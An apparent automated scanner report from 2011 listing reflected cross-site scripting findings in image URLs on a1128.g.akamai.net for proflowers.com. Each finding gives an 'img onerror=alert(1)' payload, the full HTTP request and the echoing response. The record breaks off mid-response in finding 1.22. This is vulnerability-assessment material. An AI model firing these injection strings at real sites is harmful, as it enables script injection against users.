1.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34 was submitted in the REST URL parameter 9. This input was echoed as 3e084<img src=a onerror=alert(1)>6d551d44b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img%20src%3da%20onerror%3dalert(1)>6d551d44b34?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:56 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF3e084<img src=a onerror=alert(1)>6d551d44b34
1.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97 was submitted in the REST URL parameter 9. This input was echoed as 360ac<img src=a onerror=alert(1)>d12f5cff97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC360ac<img%20src%3da%20onerror%3dalert(1)>d12f5cff97?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/Damask_AC360ac<img src=a onerror=alert(1)>d12f5cff97
1.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72 was submitted in the REST URL parameter 9. This input was echoed as 809b9<img src=a onerror=alert(1)>db4c58a7a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn809b9<img%20src%3da%20onerror%3dalert(1)>db4c58a7a72?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn809b9<img src=a onerror=alert(1)>db4c58a7a72
1.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de was submitted in the REST URL parameter 9. This input was echoed as 70245<img src=a onerror=alert(1)>3f5fb4274de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF70245<img%20src%3da%20onerror%3dalert(1)>3f5fb4274de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu11_PF70245<img src=a onerror=alert(1)>3f5fb4274de
1.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e was submitted in the REST URL parameter 9. This input was echoed as 58380<img src=a onerror=alert(1)>53b2f6a2f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF58380<img%20src%3da%20onerror%3dalert(1)>53b2f6a2f5e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF58380<img src=a onerror=alert(1)>53b2f6a2f5e
1.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5 was submitted in the REST URL parameter 9. This input was echoed as 85dbd<img src=a onerror=alert(1)>62480e56d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF85dbd<img%20src%3da%20onerror%3dalert(1)>62480e56d5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_dmsk11_PF85dbd<img src=a onerror=alert(1)>62480e56d5
1.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3 was submitted in the REST URL parameter 9. This input was echoed as 58a40<img src=a onerror=alert(1)>eed651848d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img%20src%3da%20onerror%3dalert(1)>eed651848d3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg10_PF58a40<img src=a onerror=alert(1)>eed651848d3
1.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e was submitted in the REST URL parameter 9. This input was echoed as c75a4<img src=a onerror=alert(1)>d12803aeb3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img%20src%3da%20onerror%3dalert(1)>d12803aeb3e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PFc75a4<img src=a onerror=alert(1)>d12803aeb3e
1.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e was submitted in the REST URL parameter 9. This input was echoed as 733a8<img src=a onerror=alert(1)>699c828870e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img%20src%3da%20onerror%3dalert(1)>699c828870e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF733a8<img src=a onerror=alert(1)>699c828870e
1.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6 was submitted in the REST URL parameter 9. This input was echoed as 2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img%20src%3da%20onerror%3dalert(1)>8ef0b6a0ff6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF2ccba<img src=a onerror=alert(1)>8ef0b6a0ff6
1.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e was submitted in the REST URL parameter 9. This input was echoed as 6a737<img src=a onerror=alert(1)>47eeba19c2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF6a737<img%20src%3da%20onerror%3dalert(1)>47eeba19c2e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQithasitall_rbye10_PF6a737<img src=a onerror=alert(1)>47eeba19c2e
1.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d was submitted in the REST URL parameter 9. This input was echoed as e3afe<img src=a onerror=alert(1)>9e93c1e129d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img%20src%3da%20onerror%3dalert(1)>9e93c1e129d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet11_FC_PFe3afe<img src=a onerror=alert(1)>9e93c1e129d
1.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb was submitted in the REST URL parameter 9. This input was echoed as a76a3<img src=a onerror=alert(1)>b2c254cdacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PFa76a3<img%20src%3da%20onerror%3dalert(1)>b2c254cdacb?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet11_PFa76a3<img src=a onerror=alert(1)>b2c254cdacb
1.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef was submitted in the REST URL parameter 9. This input was echoed as 995b4<img src=a onerror=alert(1)>39f37b6a9ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img%20src%3da%20onerror%3dalert(1)>39f37b6a9ef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:51 GMT
Connection: close

Unable to find /ProvideCommerce/MBQlittleallthefrills_gv11_PF995b4<img src=a onerror=alert(1)>39f37b6a9ef
1.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967 was submitted in the REST URL parameter 9. This input was echoed as d7a61<img src=a onerror=alert(1)>2d0b0eab967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
